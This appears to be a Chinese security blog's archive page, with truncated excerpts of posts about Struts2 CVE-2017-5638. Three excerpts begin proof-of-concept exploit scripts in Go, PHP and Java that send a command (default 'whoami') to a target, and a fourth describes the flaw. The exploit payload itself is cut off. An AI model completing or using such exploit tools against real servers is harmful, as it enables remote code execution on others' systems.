现在位置: 首页 > 所有2017年03月发表的文章
其实Struts2代码执行原理很简单, 再来一个golang版的 , 不用怀疑, 我写这么多版本其实就是用来搞笑的 package main import ( "fmt" "os" "net/http" "io/ioutil" "strings" ) func httpGet(url, commend string) (result string) { var ret string if "http" != substr(url, 0 , 4) { url = "http://" + url } resp, err := http.Get(url) if err != nil { ret = "网站无法正常打开!" } defer resp.Body.Clo...
阅读全文
  /** * Created by IntelliJ IDEA. * User: jisec.com * Date: 2017/3/7 * Time: 下午4:45 */ function getContext($url, $content, $commend){ $ret = http_request($url, null, $commend); printf($ret); }; function http_request($url, $data = null, $commend = "whoami") { $curl = curl_init(); $header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,"; $header[0] .= "text/html;q=0.9,text...
阅读全文
  https://github.com/Mofree/SecurityTools/tree/master/script package demo; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.net.HttpURLConnection; import java.net.URL; public class Stpoc { public Stpoc() { } public static String getContext(URL url, String encode, String commend) { StringBuffer contentBuffe...
阅读全文
今天凌晨,安全研究员Nike Zheng在Struts2上发现一个高危漏洞(漏洞编号为CVE-2017-5638),当基于Jakarta Multipart解析器上传文件时,可能会导致远程代码执行。 Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2以WebWork为核心,采用拦截器的机制来处理用户的请求,这样的设计也使得业务逻辑控制器能够与Servl...
阅读全文